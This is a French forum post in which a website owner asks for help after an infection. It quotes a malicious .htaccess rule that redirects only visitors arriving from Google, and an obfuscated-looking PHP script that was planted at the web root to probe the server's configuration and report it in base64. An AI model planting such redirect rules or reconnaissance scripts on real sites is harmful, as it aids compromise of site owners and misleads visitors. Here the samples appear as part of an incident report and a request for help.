Tweet
Bonjour, a l'aide d'un outil google, je me suis rendu compte qu'un des sites que j'avais realisé etait infecté
En cherchant, j'ai vu que le .htaccess contenait ceci (visible avec wordpad et pas le bloc note)
ensuite un fichier est placé a la racine
J'ai tout corrigé, modifié les mdp et compte sur le serveur mais si quelqu'un comprends le pourquoi du comment et si c'est grave car il a reussi a remonter avant le dossier public_html
Merci
En cherchant, j'ai vu que le .htaccess contenait ceci (visible avec wordpad et pas le bloc note)
Code:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google)\.(.*)
RewriteRule ^(.*)$
</IfModule>
Code:
<?php error_reporting(0);function _getBytes($val){$val = trim($val);$last = strtolower($val[strlen($val)-1]);switch($last){case "g":$val *= 1024;case "m":$val *= 1024;case "k":$val *= 1024;}return $val;}$d = dirname($_SERVER["SCRIPT_FILENAME"]);$ini_memory_limit = _getBytes(ini_get("memory_limit"));$phpversion_gd = false;if (function_exists("gd_info")){$r = gd_info();if (preg_match("/[\d\.]+/", $r["GD Version"], $m)){$phpversion_gd = $m[0];}}$phpversion_curl = false;if (function_exists("curl_version")){$phpversion_curl = curl_version();$phpversion_curl = $phpversion_curl["version"];}$phpversion_sqlite = phpversion("sqlite3");if ( $phpversion_sqlite === false ){$phpversion_sqlite = phpversion("sqlite");}$o = array("ds" => DIRECTORY_SEPARATOR,"fd" => true,"path" => $d,"has_php" => phpversion(),"has_php_zlib" => phpversion("zlib"),"has_php_mysql" => phpversion("mysql"),"has_php_mysqli" => phpversion("mysqli") !== false ? "1" : false,"has_php_pdo_mysql" => phpversion("pdo_mysql"),"has_php_gd" => $phpversion_gd,"has_php_curl" => $phpversion_curl,"has_php_zip" => phpversion("zip"),"has_php_simplexml" => phpversion("simplexml") !== false ? "1" : false,"has_php_sqlite" => $phpversion_sqlite, "has_php_zend" => extension_loaded("Zend Guard Loader") || extension_loaded("Zend Optimizer") ? "1" : false,"has_php_memory_limit" => $ini_memory_limit === 0 ? false : ceil($ini_memory_limit/1048576),"has_mysql" => function_exists("mysql_get_client_info") ? true :( function_exists("mysqli_get_client_info") ? true :( phpversion("mysqlnd") !== false ? true : false )),"has_php_safe_mode" => ini_get("safe_mode") && ini_get("safe_mode") !== "off" ? true : false,"has_php_open_basedir" => ini_get("open_basedir") ? true : false,"has_php_register_globals" => ini_get("register_globals") && ini_get("register_globals") !== "off" ? true : false,"has_php_short_open_tag" => ini_get("short_open_tag") && ini_get("short_open_tag") !== "off" ? true : false,"has_php_url_fopen" => ini_get("allow_url_fopen") && ini_get("allow_url_fopen") !== "off" ? true : false,"has_php_cgi" => false,"has_asp" => false);if (isset($_SERVER["DATABASE_SERVER"])){$o["has_mysql_host"] = $_SERVER["DATABASE_SERVER"];}if ( DIRECTORY_SEPARATOR === "\\" ){$o["has_php_suexec"] = true;}else{if ( false !==( $fp = fopen($d.'/deleteme.fdlqlggs.php.txt',"a") )){@flock($fp,LOCK_EX);$i = 0;while ( $i < 10 *2 ){if (!@fwrite($fp,str_repeat(" ",524288))){$o["fs"] = false;break;}++$i;}@flock($fp,LOCK_UN);@fclose($fp);}if (file_exists($d.'/deleteme.fdlqlggs.php.txt')){$o["has_php_suexec"] = fileowner($d.'/deleteme.fdlqlggs.php.txt') === fileowner($d.'/deleteme.fdlqlggs.php');unlink($d.'/deleteme.fdlqlggs.php.txt');}else{$o["has_php_suexec"] = false;}}echo "__deleteme.fdlqlggs.php__",base64_encode(serialize($o)),"__";?>
Merci
. Merci
Commentaire